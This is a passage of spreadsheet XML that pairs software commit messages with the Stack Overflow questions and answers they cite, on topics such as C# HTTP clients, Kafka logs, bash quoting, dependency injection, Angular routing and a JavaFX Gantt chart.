  &amp;quot;cache-control&amp;quot;=&amp;quot;no-cache&amp;quot;
  &amp;quot;pragma&amp;quot;=&amp;quot;no-cache&amp;quot;    
}
StatusCode        : 200
StatusDescription : OK
Content           :
                    &amp;lt;!DOCTYPE html&amp;gt;
                    &amp;lt;html lang=&amp;quot;en&amp;quot; xmlns=&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;&amp;gt;
                    &amp;lt;head&amp;gt;
                        &amp;lt;meta http-equiv=&amp;quot;X-UA-Compatible&amp;quot; content=&amp;quot;IE=edge,chrome=1&amp;quot; /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas why the &lt;code&gt;c#&lt;/code&gt; equivalent doesn't work? I tried to play with the &lt;code&gt;HttpClientHandler&lt;/code&gt; and the &lt;code&gt;SocketsHttpHandler&lt;/code&gt; for hours trying to tweak configuration variables with no success. Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C936</t>
  </si>
  <si>
    <t>fix(react-native): use View as a container for react-native (#1729)
fixes #1730 
Also fixes:
- http://stackoverflow.com/questions/41064940/using-algolia-react-instantsearch-with-react-native
- http://stackoverflow.com/questions/41066380/react-native-algolia-instantsearch-expected-a-component-class-got-object-objec
 master</t>
  </si>
  <si>
    <t xml:space="preserve">We need to implement role-based security across our solution which has asp.net, winforms and web service entry points. We will also need some front end to configure it. I really don't feel like rolling my own,s I have done it a few times before and it is tedious.
I have historically not been a fan of the MS ABs because I found them to be over architected and inadequately unit-tested, but I haven't touched them for a few years. 
Is the Security AB worth a look, or should I use an alternative? What would you recommend?
</t>
  </si>
  <si>
    <t>C937</t>
  </si>
  <si>
    <t>Quote string components before doing bash eval
When doing a bash `eval`, we need to escape any variables that come from
the "outside".
Thanks to http://stackoverflow.com/questions/2854655 for the solution!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Bash:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;printf "%q" "hello\world" | someprog
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;printf "%q" "hello\world"
hello\\world
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This could be used through variables too:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;printf -v var "%q\n" "hello\world"
echo "$var"
hello\\world
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;edit: kafka version 3.5.1 with separated kraft quorum, with 3 members.&lt;/p&gt;
&lt;p&gt;Long story short, we recently updated the java versions and jmx agents on our kafka clusters. Which required a rolling restart of all components of our kafka cluster. Everything went smooth, we saw no problems at all. We restarted brokers first, then the controllers. Which means the active controller changed for the Kraft controller quorum.&lt;/p&gt;
&lt;p&gt;Until now everything is ok, today (3 days after the restarts) we randomly see the below errors saying the brokers are recording the new controller. This cluster is not massively in use and can have brokers not doing much for days. These logs doesnt really cause any problems, they happend once and didn't effect anything, but they are still annoying to see.&lt;/p&gt;
&lt;p&gt;My question here is, on quorum leader change aren't brokers recording the active controller immediately? Do they need to have trigger which causes them to get active controller to realize which controller is the leader? Isn't there a mechanism to get metadata updates for brokers about quorum state?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2025-02-20 09:45:39.428 
[2025-02-20 09:45:39,368] INFO [BrokerToControllerChannelManager id=106 name=forwarding] Node 101 disconnected. (org.apache.kafka.clients.NetworkClient)
2025-02-20 09:35:39.237 
[2025-02-20 09:35:39,041] INFO [broker-106-to-controller-forwarding-channel-manager]: Recorded new controller, from now on will use node ***:9093 (id: 101 rack: null) (kafka.server.BrokerToControllerRequestThread)
2025-02-20 09:35:39.237 
[2025-02-20 09:35:39,040] INFO [BrokerToControllerChannelManager id=106 name=forwarding] Client requested disconnect from node 103 (org.apache.kafka.clients.NetworkClient)
2025-02-20 09:34:42.352 
[2025-02-20 09:34:42,113] INFO [BrokerToControllerChannelManager id=108 name=forwarding] Node 101 disconnected. (org.apache.kafka.clients.NetworkClient)
2025-02-20 09:24:42.178 
[2025-02-20 09:24:42,045] INFO [broker-108-to-controller-forwarding-channel-manager]: Recorded new controller, from now on will use node ***:9093 (id: 101 rack: null) (kafka.server.BrokerToControllerRequestThread)
2025-02-20 09:24:42.178 
[2025-02-20 09:24:42,043] INFO [BrokerToControllerChannelManager id=108 name=forwarding] Client requested disconnect from node 103 (org.apache.kafka.clients.NetworkClient)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C938</t>
  </si>
  <si>
    <t>Introducing ClasspathScanDescriptionProvider instead of hardcoded
components.
Updating MRUnit dependency to 1.0.0
Fixing serialization issues:
http://stackoverflow.com/questions/22532309/mrunit-with-hbase-and-mapreduce-gets-an-error-with-serialization
http://stackoverflow.com/questions/15476332/java-lang-nullpointerexception-using-mrunit-custom-key-serialization-error
 master</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With the version HBase 0.96 some classes aren't implement Writable anymore, but people from HBase have created a new serialize classes for them. &lt;/p&gt;
&lt;p&gt;So, the solutions is to indicate in the Configuration what classes MRUnit must use:&lt;/p&gt;
&lt;p&gt;The property is called &lt;strong&gt;io.serializations&lt;/strong&gt;
The different serializes are:&lt;/p&gt;
&lt;p&gt;Result class org.apache.hadoop.hbase.mapreduce.ResultSerialization
KeyValue class org.apache.hadoop.hbase.mapreduce.KeyValueSerialization
Put &amp;amp; Get classes org.apache.hadoop.hbase.mapreduce.MutationSerialization&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi just about to get the dev team to start looking at the next version of a CRM type SOA based application and the thorny issue of Application Front End came up.
Currently the application is a composite application using 
Web Forms (.net2) 
Sharepoint 2003
InfoPath *
BizTalk
*Not FormsServer though - was before FormServer as we hack the ProgID in HTTP to launch a server based XSD for InfoPath and punch data into that on load.
We are looking at moving to MVC or MVVM model as we have web services and a database to interact with and we can see the move to that architecture to be a good one with 3.5 and Linq (although we have keyTables for managing one to many relationships that dont appear to work that well with LinqToSQL or EF... but i digress)
So we are at a point of looking at what would be good for the contact centre taking in these points
We must have a web server version for deployment (?) XBAP may diminsh this
Visulisation v Speed (WPF/SilverLight v WebForms and Grids)
So was wondering if anyone else faced this dilemma, hints tips and which would you choose based on your experience?
EDIT
Thanks for the links to Prism and the EP Site - already been looking at that - was hopeing for some real life expereinces...
</t>
  </si>
  <si>
    <t>C939</t>
  </si>
  <si>
    <t>WIP: Attempt to create PNG file with BufferedImage and ImageIO.
The drawLine() method doesn't seem to work well. For it to work,
the draw needs to extend into a neighboring pixel.
Looked at places like:
http://stackoverflow.com/questions/1528458/save-drawing-in-jcomponent-into-tiff-file
http://stackoverflow.com/questions/4245179/java-paint-component-into-bitmap
http://stackoverflow.com/questions/2394192/java-imageio-write-completely-corrupted-png-and-or-bmp-with-incorrect-data
http://stackoverflow.com/questions/4386446/problem-using-imageio-write-jpg-file
http://www.mkyong.com/java/how-to-write-an-image-to-file-imageio/
 master</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is essentially identical to &lt;a href="https://stackoverflow.com/questions/1528458/save-drawing-in-jcomponent-into-tiff-file/1528485#1528485"&gt;broschb's&lt;/a&gt; solution only using correct syntax and actually calling the appropriate JAI routines.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void saveComponentAsTiff(Component c, String filename, boolean subcomp) throws IOException {
    saveComponentTiff(c, "tiff", filename, subcomp);
}
public void saveComponent(Component c, String format, String filename, boolean subcomp) throws IOException {
    // Create a renderable image with the same width and height as the component
    BufferedImage image = new BufferedImage(c.getWidth(), c.getHeight(), BufferedImage.TYPE_INT_ARGB);
    if(subcomp) {
        // Render the component and all its sub components
        c.paintAll(image.getGraphics());
    }
    else {
        // Render the component and ignoring its sub components
        c.paint(image.getGraphics());
    }
    // Save the image out to file
    ImageIO.write(image, format, new File(filename));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Documentation for the various functions can be found here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://java.sun.com/javase/6/docs/api/java/awt/Component.html#paint%28java.awt.Graphics%29" rel="nofollow noreferrer"&gt;Component.paint(Graphics)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://java.sun.com/javase/6/docs/api/java/awt/Component.html#paintAll%28java.awt.Graphics%29" rel="nofollow noreferrer"&gt;Component.paintAll(Graphics)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://java.sun.com/javase/6/docs/api/java/awt/image/BufferedImage.html#BufferedImage%28int,%20int,%20int%29" rel="nofollow noreferrer"&gt;BufferedImage(int, int, int)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://java.sun.com/javase/6/docs/api/java/awt/image/BufferedImage.html#getGraphics%28%29" rel="nofollow noreferrer"&gt;BufferedImage.getGraphics()&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://java.sun.com/javase/6/docs/api/javax/imageio/ImageIO.html#write%28java.awt.image.RenderedImage,%20java.lang.String,%20java.io.File%29" rel="nofollow noreferrer"&gt;ImageIO.write(RenderedImage, String, File)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you want to save in a format other than tiff you can use &lt;a href="http://java.sun.com/javase/6/docs/api/javax/imageio/ImageIO.html#getWriterFormatNames%28%29" rel="nofollow noreferrer"&gt;ImageIO.getWriterFormatNames()&lt;/a&gt; to obtain a list of all image output formats currently loaded by the JRE.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; If you are not interested in painting sub components you can substitute the call to Component.paintAll(...) with Component.paint(...). I have altered the example code to reflect this. Setting subcomp to true with render the subcompnents  and setting it to false will ignore them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a very simple broadcast extension on iOS starting a RelayKit screen capture.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import Foundation
import ReplayKit
final class BroadcastSampleHandler: RPBroadcastSampleHandler {
    override func broadcastStarted(withSetupInfo setupInfo: [String : NSObject]?) {
        NSLog(&amp;quot;broadcastStarted with info: \(setupInfo)&amp;quot;)
    }
    .......
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After it starts I see plenty of similar logs in the Console.app:&lt;/p&gt;
&lt;p&gt;&lt;code&gt; [INFO] -[RPBroadcastSampleHandler _processPayloadWithAudioSample:type:]:180 Broadcast extension received audio payload from replayd&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.postimg.cc/ZnHXWp0Q/Logs.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.postimg.cc/ZnHXWp0Q/Logs.png" alt="Logs" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;They are flooding the entire iPhone log and are produced every 20 milliseconds. Why does _processPayloadWithAudioSample log every video frame or every audio buffer chunk.&lt;/p&gt;
&lt;p&gt;I tried redirecting them with &lt;code&gt;freopen()&lt;/code&gt; but this doesn't work as extension seems to be sandboxed and has no access to system-level I/O operations.&lt;/p&gt;
&lt;p&gt;I guess such extensive logs can affect the perfomance of the app to some extent.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C94</t>
  </si>
  <si>
    <t>Simplifying the API #71
JobManager.JobException dependency injection #91
Instead of:
public class MyRegistry : Registry
{
    public MyRegistry()
    {
        Schedule&lt;MyJob&gt;().ToRunOnceIn(5).Seconds();
        Schedule&lt;MyOtherJob&gt;().ToRunNow().AndEvery(2).Days();
    }
} 
protected void Application_Start()
{
    JobManager.Initialize(new MyRegistry()); 
}
We could just:
protected void Application_Start()
{
    JobManager.Schedule&lt;MyJob&gt;().ToRunOnceIn(5).Seconds();
    JobManager.Schedule&lt;MyOtherJob&gt;().ToRunNow().AndEvery(2).Days();
    JobManager.Start(); 
}
The latter is way simpler to use (not to mention that we could also ditch the AddJob method for late jobs, just use the Schedule whenever need).
One could argue that this way you can't have multiple registries implementation, but I bet that no one does that.
It's a little tricky to implement since the current JobManager is designed to work with an Registry (but it's worth the effort nonetheless).
Also, instead of:
public class MyJobFactory : IJobFactory
{
    public IJob GetJobInstance&lt;T&gt;() where T : IJob
    {
        return MyDepencyInjectionFramework.GetInstance&lt;T&gt;();
    }
}
JobManager.JobFactory = new MyJobFactory();
We could just:
// "type" here is System.Type
JobManager.GetJobInstance = type =&gt; MyDepencyInjectionFramework.GetInstance(type) as IJob;
We lose the generics ("&lt;T&gt;") but a decent dependency injection framework (if not all of them) supports dealing with Type.
There would be no worry on the dependency injection framework returning null or the as conversion in the example doing so, the library would check for it and would throw a JobCreationException with a lovely message explaining what happened (instead of letting a NullReferenceException happen somewhere).
Are these links worth looking at? They are related to dependency injection "inside" a library.
http://stackoverflow.com/questions/2045904/dependency-inject-di-friendly-library
While the links are great to someone that is starting to grasp IoC (and DI for that matter), they don’t say much about why or when should a library be DI aware.
(I love how this guy had a breakdown): https://stackoverflow.com/questions/2045904/dependency-inject-di-friendly-library/2046142#2046142
In my experience, DI is a powerful tool when it comes to application architecture, but it's only useful when you have a well-defined core domain. The domain defines the interfaces, then other layers implement it (sometimes it’s useful to have more than one implementation of an interface). Then, just before the domain starts to run, you inject the implementation into the domain.
The domain defines only the interface, yet it still directly calls the injected implementation (even though it doesn’t know its type or from where it comes from). There you have it, the Inversion of Control.
But a library has nothing to do with that. Unless you are aiming for making more of a framework, a library shouldn’t dictate in any way the high level details of your architecture. A library is supposed to be used inside an implementation of yours of an interface of yours. You, the system designer and library user, should be 100% responsible of your DI design and usage.
Just imagine the mess if every library attempted to have some sort of DI awareness corner.</t>
  </si>
  <si>
    <t>This is actually simple to do once you understand that DI is about patterns and principles, not technology.
To design the API in a DI Container-agnostic way, follow these general principles:
Program to an interface, not an implementation
This principle is actually a quote (from memory though) from Design Patterns, but it should always be your real goal. DI is just a means to achieve that end.
Apply the Hollywood Principle
The Hollywood Principle in DI terms says: Don't call the DI Container, it'll call you.
Never directly ask for a dependency by calling a container from within your code. Ask for it implicitly by using Constructor Injection.
Use Constructor Injection
When you need a dependency, ask for it statically through the constructor:
public class Service : IService
{
    private readonly ISomeDependency dep;
    public Service(ISomeDependency dep)
    {
        if (dep == null)
        {
            throw new ArgumentNullException("dep");
        }
        this.dep = dep;
    }
    public ISomeDependency Dependency
    {
        get { return this.dep; }
    }
}
Notice how the Service class guarantees its invariants. Once an instance is created, the dependency is guaranteed to be available because of the combination of the Guard Clause and the readonly keyword.
Use Abstract Factory if you need a short-lived object
Dependencies injected with Constructor Injection tend to be long-lived, but sometimes you need a short-lived object, or to construct the dependency based on a value known only at run-time.
See this for more information.
Compose only at the Last Responsible Moment
Keep objects decoupled until the very end. Normally, you can wait and wire everything up in the application's entry point. This is called the Composition Root.
More details here:
https://stackoverflow.com/questions/1475575/where-should-i-do-dependency-injection-with-ninject-2/1475861#1475861
https://stackoverflow.com/questions/1410719/design-where-should-objects-be-registered-when-using-windsor/1410738#1410738
Simplify using a Facade
If you feel that the resulting API becomes too complex for novice users, you can always provide a few Facade classes that encapsulate common dependency combinations.
To provide a flexible Facade with a high degree of discoverability, you could consider providing Fluent Builders. Something like this:
public class MyFacade
{
    private IMyDependency dep;
    public MyFacade()
    {
        this.dep = new DefaultDependency();
    }
    public MyFacade WithDependency(IMyDependency dependency)
    {
        this.dep = dependency;
        return this;
    }
    public Foo CreateFoo()
    {
        return new Foo(this.dep);
    }
}
This would allow a user to create a default Foo by writing
var foo = new MyFacade().CreateFoo();
It would, however, be very discoverable that it's possible to supply a custom dependency, and you could write
var foo = new MyFacade().WithDependency(new CustomDependency()).CreateFoo();
If you imagine that the MyFacade class encapsulates a lot of different dependencies, I hope it's clear how it would provide proper defaults while still making extensibility discoverable.
FWIW, long after writing this answer, I expanded upon the concepts herein and wrote a longer blog post about DI-Friendly Libraries, and a companion post about DI-Friendly Frameworks.</t>
  </si>
  <si>
    <t>I'm pondering the design of a C# library, that will have several different high level functions. Of course, those high-level functions will be implemented using the [SOLID][1] class design principles as much as possible. As such, there will probably be classes intended for consumers to use directly on a regular basis, and "support classes" that are dependencies of those more common "end user" classes.
The question is, when designing a library what techniques can make it:
 - DI Agnostic - Although adding basic "support" for one or two of the common DI libraries (StructureMap, Ninject, etc) seems reasonable, I want consumers to be able to use the library with any DI framework.
 - Non-DI usable - If a consumer of the library is using no DI, the library should still be as easy to use as possible, reducing the amount of work a user has to do to create all these "unimportant" dependencies just to get to the "real" classes they want to use.
My current thinking is to provide a few "DI registration modules" for the common DI libraries (e.g a StructureMap registry, a Ninject module), and a set or Factory classes that are non-DI and contain the coupling to those few factories.
  [1]: http://butunclebob.com/ArticleS.UncleBob.PrinciplesOfOod</t>
  </si>
  <si>
    <t xml:space="preserve">Some context upfront:
Imagine a 200+ developers company finally setting up a more or less independent architecture team/department.
The software portfolio consisting of 20+ "projects"/applications of varying sizes in production was taken care of by team-leads/technical-leads, who were responsible for and in charge of the projects "architecture" as well.
Out of the necessity to consolidate and control the architecture and enable certain needed large reworks on the systems as a whole, in addition of the all so needed knowledge exchange, the company decided to set-up an architecture department.
What are the DOs and DON'Ts of such an undertaking?
Who are the people making up such an architecture team?
What should be their responsibilities? 
What's out of their scope? 
What are the useful transition strategies for the company?
How to prevent those wry looks every time someone even mentions "the architecture team"?
Did your company undergo such a change already successfully?Why did it fail?Why was it successful?
That's should not be a discussion on "What is architecutre?"(which is very closely related ;). 
The really interesting points would be acceptable/realistic maybe even frictionless ways to install such a team, besides of course some warnings regarding battles better not to be even started.
</t>
  </si>
  <si>
    <t>C940</t>
  </si>
  <si>
    <t>Handling error messages from server. Fields for error and success mes
sages. Redirections.
Sources:
- https://stackoverflow.com/questions/58556569/angular-7-router-navigate-with-message-after-redirecting
- https://stackoverflow.com/questions/44864303/send-data-through-routing-paths-in-angular</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You can do that with &lt;code&gt;State&lt;/code&gt; as below:&lt;/p&gt;
&lt;p&gt;When you want to navigate set &lt;code&gt;state&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const navigationExtras: NavigationExtras = {state: {data: 'This is an example'}};
this.router.navigate(['/abc'], navigationExtras);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In destination component you can get data like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;data:string;
constructor(private router: Router) { 
   const navigation = this.router.getCurrentNavigation();
   const state = navigation.extras.state as {data: string};
   this.data = state.data;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I have been a developer for approx 10 yrs. I want to know how can I consider myself to be an archtect level techie? How can  developer move from code level development, to architect?
I obviously want to move up the tech ladder, and architecture seems appealing.
A second question would be, how do I learn about application architecture (big picture), in terms of 3.5 framework?
Any advise is appreciated.
</t>
  </si>
  <si>
    <t>C941</t>
  </si>
  <si>
    <t>chore: add basic JSON documentation components
Add components with basic details for JSON libraries and fix issue resizing sidenav
content by adding autosize="true" to mat-sidenav-container tag in LayoutComponent
based on answer to stackoverflow here: https://stackoverflow.com/a/64161618.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;
&lt;li&gt;Not necessary to use &lt;code&gt;autoSize&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Add attribute &lt;code&gt;[style.left]="sidenav.opened ? '.25%' : '0'"&lt;/code&gt; to &lt;code&gt;mat-sidenav-content&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Not necessary to use &lt;code&gt;opened&lt;/code&gt; attribute on &lt;code&gt;mat-sidenav&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Use attribue &lt;code&gt;[fixedInViewport]="false"&lt;/code&gt; with &lt;code&gt;mat-sidenav&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i am using &lt;a href="https://socket.io" rel="nofollow noreferrer"&gt;socket.io&lt;/a&gt; in a simple javascript app. I want to alert the user when upgrade to websocket fails due to any reason and HTTP long-polling is used as a fallback, so user knows that connection is not optimal.&lt;/p&gt;
&lt;p&gt;I have read the socket.io documentation, &lt;a href="https://socket.io/docs/v4/troubleshooting-connection-issues/#problem-the-socket-is-stuck-in-http-long-polling" rel="nofollow noreferrer"&gt;websocket upgrade troubleshoot page&lt;/a&gt; and &lt;a href="https://socket.io/docs/v4/faq/" rel="nofollow noreferrer"&gt;faq page&lt;/a&gt;. I know when upgrade to websocket is successful (e.g. &lt;code&gt;socket.io.engine.on(&amp;quot;upgrade&amp;quot;, () =&amp;gt; {});&lt;/code&gt;, but I don't find the opposite there.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C942</t>
  </si>
  <si>
    <t>Fetch components by url
Rather than invoking using a blob, see https://stackoverflow.com/questions/57938081. This needs a change in piral-blazor.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;ol&gt;
  &lt;li&gt;Is there a way to increase this limit?&lt;/li&gt;
  &lt;/ol&gt;
&lt;/blockquote&gt;
&lt;p&gt;No (unless you modify and recompile blazor and mono/wasm that is).&lt;/p&gt;
&lt;blockquote&gt;
  &lt;ol start="2"&gt;
  &lt;li&gt;Apart from breaking down the string into multiple segments and performing multiples calls, is there any other way to process a large string?&lt;/li&gt;
  &lt;/ol&gt;
&lt;/blockquote&gt;
&lt;p&gt;Yes, as you are on the client side, you can use the shared memory techniques. You basically map a .net &lt;code&gt;byte[]&lt;/code&gt; to an &lt;code&gt;ArrayBuffer&lt;/code&gt;. See &lt;a href="https://github.com/Tewr/BlazorFileReader/blob/58ae55a5c5737d08adf2350891eadbfe82a76bd9/src/Blazor.FileReader/script/FileReaderComponent.ts#L202" rel="nofollow noreferrer"&gt;this&lt;/a&gt; (disclaimer: My library) or &lt;a href="https://github.com/SteveSandersonMS/BlazorInputFile/blob/075a154d81192b588164608f9c381bece4d42f5e/BlazorInputFile/wwwroot/inputfile.js#L47" rel="nofollow noreferrer"&gt;this&lt;/a&gt; library for reference on how to do it. These examples are using the binary content of actual javascript &lt;code&gt;File&lt;/code&gt;s but it's applicable to strings as well. There is no reference documentation on these API's yet. Mostly just examples and the &lt;a href="https://github.com/aspnet/AspNetCore/blob/2de6c732d1f410460a627cb75aca91ae2c741fd5/src/Components/Web.JS/src/Services/Http.ts#L64" rel="nofollow noreferrer"&gt;blazor source code&lt;/a&gt;. &lt;/p&gt;
&lt;blockquote&gt;
  &lt;ol start="3"&gt;
  &lt;li&gt;Is there any other approach for processing large files?&lt;/li&gt;
  &lt;/ol&gt;
&lt;/blockquote&gt;
&lt;p&gt;See 2)&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I have 2 desktop applications that I wish to integrate with external applications. One of the applications is extended with plugins which are developed by me, to provide specific features which are not common for all distributions. The situation can be described in the following diagram:
[external-link]
As I mentioned, I want to integrate (receive and send data) my applications with external applications or SDKs. Usually there 2 types of data from external applications: 
General/Common data - which is always relevant
Specific data - which should be handled differently for each external application
With "Core Application", the wanted situation can is described in this diagram:
[external-link]
The General data is handled in the Core Application, and the specific data is handled in plugins (support plugins).
A distribution of this application might be one of
Core Application + Yakko App + Yakko App Integrator + Yakko App Support Plugin
Core Application + Dot App + Dot App Integrator
For the other application, I want to keep the same "Integrators", but to handle them differently inside the application:
[external-link]
How would you recommend to implement support in my applications for integrating external applications and SDKS, as I just described? 
Notes:
I'm using C++ on Windows and the plugins are distributed as DLLs.
The data types that will be used are always known in advance, I just need some generic way to move it from the source to the handler.
</t>
  </si>
  <si>
    <t>C943</t>
  </si>
  <si>
    <t>FGMouseInput: fix two uses of std::ostringstream
Seeking to the beginning doesn't clear the contents. Note that we don't
use std::ostringstream::str() either, because apparently
std::ostringstream is too complex to be easily reset to a clean state,
so we just recreate an instance every time we need.
cf. https://stackoverflow.com/a/12112642/4756009 and
    https://stackoverflow.com/questions/624260/how-to-reuse-an-ostringstream/624291#comment437178_624276</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You didn't &lt;code&gt;clear()&lt;/code&gt; the stream after calling &lt;code&gt;str("")&lt;/code&gt;. Take another look at &lt;a href="https://stackoverflow.com/questions/20731/in-c-how-do-you-clear-a-stringstream-variable"&gt;this answer&lt;/a&gt;, it also explains why you should reset using &lt;code&gt;str(std::string())&lt;/code&gt;. And in your case, you could also reset the contents using only &lt;code&gt;str(szLine)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If you don't call &lt;code&gt;clear()&lt;/code&gt;, the flags of the stream (like &lt;code&gt;eof&lt;/code&gt;) wont be reset, resulting in surprising behaviour ;)&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently started using TCA, and for dependency injection, I used the Dependencies library. What I did is that I created a Repository in the data layer, which conforms to the RepositoryProtocol defined in the domain layer, and in the domain layer, I have a UseCase where I use @Dependency(.repository) to resolve the repository inside the UseCase. The general code structure is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Domain layer
public protocol RepositoryProtocol {
    func getList(id: Int?) async -&amp;gt; Result&amp;lt;(data: [Int]?, lastPage: Int), NetworkError&amp;gt;
}
public class UseCase: UseCaseProtocol {
    @Dependency(\.repository) public var repository
    func getList(id: Int?) async -&amp;gt; Result&amp;lt;(data: [Int]?, lastPage: Int), NetworkError&amp;gt;
        return await repository.getList(id: id, page: page, perPage: perPage)
    }
}
// Data layer
public class Repository {
    @Dependency(\.transformer) public var Transformer
    @Dependency(\.errorTransformer) public var Transformer
    @Dependency(\.service) public var service: ServiceProtocol
    public init() {}
}
extension Repository: RepositoryProtocol {
    public func getList(id: Int?) async -&amp;gt; Result&amp;lt;(data: [Int]?, lastPage: Int), NetworkError&amp;gt; {
        do {
            let (data, lastPage) = try await service.getList(id: Int?)
            let entities = data.map { transformer.transform($0) }
            return .success((data: entities, lastPage: lastPage))
        } catch {
            let networkingError = errorTransformer.transform(error)
            return .failure(networkingError)
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I encounter an issue when trying to resolve the Repository in the UseCase, and I get the following error:
Cannot infer key path type from context; consider explicitly specifying a root type.&lt;/p&gt;
&lt;p&gt;The problem is likely because I don't have access to the data layer in the domain layer, which causes this error. My question is: where should I register the dependencies? How and where should I implement this code so that I can use the Repository in the UseCase?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;extension Repository: DependencyKey {
    public static var liveValue: Repository {
        Repository()
    }
}
extension DependencyValues {
    public var repository: RepositoryProtocol {
        get { self[Repository.self] }
        set { self[Repository.self] = newValue as! Repository }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C944</t>
  </si>
  <si>
    <t>[Feature] Created JavaFX Gantt Chart component.
- This code for creating this component has been taken from https://stackoverflow.com/questions/27975898/gantt-chart-from-scratch, and adapted to our project.
- By default, any code submitted on StackOverflow is under the Creative Commons licensing (https://stackoverflow.com/help/licensing).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It turned out that the BubbleChart source was a good example to start from.&lt;/p&gt;
&lt;p&gt;Basically you can use a modified version of the XYChart and its data. What you need to do is to add extradata like how long the value is valid and some style for the coloring. &lt;/p&gt;
&lt;p&gt;What's left is to use a date axis and hence date values instead of numeric ones.&lt;/p&gt;
&lt;p&gt;Here's what I've come up with in case anyone wants to toy around with it:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://i.sstatic.net/tihuM.png" alt="enter image description here"&gt;
Another example:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://i.sstatic.net/Vvf5X.png" alt="enter image description here"&gt;&lt;/p&gt;
&lt;p&gt;The source:&lt;/p&gt;
&lt;p&gt;GanttChart.java:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import javafx.beans.NamedArg;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.scene.Node;
import javafx.scene.chart.Axis;
import javafx.scene.chart.CategoryAxis;
import javafx.scene.chart.NumberAxis;
import javafx.scene.chart.ValueAxis;
import javafx.scene.chart.XYChart;
import javafx.scene.layout.StackPane;
import javafx.scene.shape.Rectangle;
public class GanttChart&amp;lt;X,Y&amp;gt; extends XYChart&amp;lt;X,Y&amp;gt; {
    public static class ExtraData {
        public long length;
        public String styleClass;
        public ExtraData(long lengthMs, String styleClass) {
            super();
            this.length = lengthMs;
            this.styleClass = styleClass;
        }
        public long getLength() {
            return length;
        }
        public void setLength(long length) {
            this.length = length;
        }
        public String getStyleClass() {
            return styleClass;
        }
        public void setStyleClass(String styleClass) {
            this.styleClass = styleClass;
        }
    }
    private double blockHeight = 10;
    public GanttChart(@NamedArg("xAxis") Axis&amp;lt;X&amp;gt; xAxis, @NamedArg("yAxis") Axis&amp;lt;Y&amp;gt; yAxis) {
        this(xAxis, yAxis, FXCollections.&amp;lt;Series&amp;lt;X, Y&amp;gt;&amp;gt;observableArrayList());
    }
    public GanttChart(@NamedArg("xAxis") Axis&amp;lt;X&amp;gt; xAxis, @NamedArg("yAxis") Axis&amp;lt;Y&amp;gt; yAxis, @NamedArg("data") ObservableList&amp;lt;Series&amp;lt;X,Y&amp;gt;&amp;gt; data) {
        super(xAxis, yAxis);
        if (!(xAxis instanceof ValueAxis &amp;amp;&amp;amp; yAxis instanceof CategoryAxis)) {
            throw new IllegalArgumentException("Axis type incorrect, X and Y should both be NumberAxis");
        }
        setData(data);
    }
    private static String getStyleClass( Object obj) {
        return ((ExtraData) obj).getStyleClass();
    }
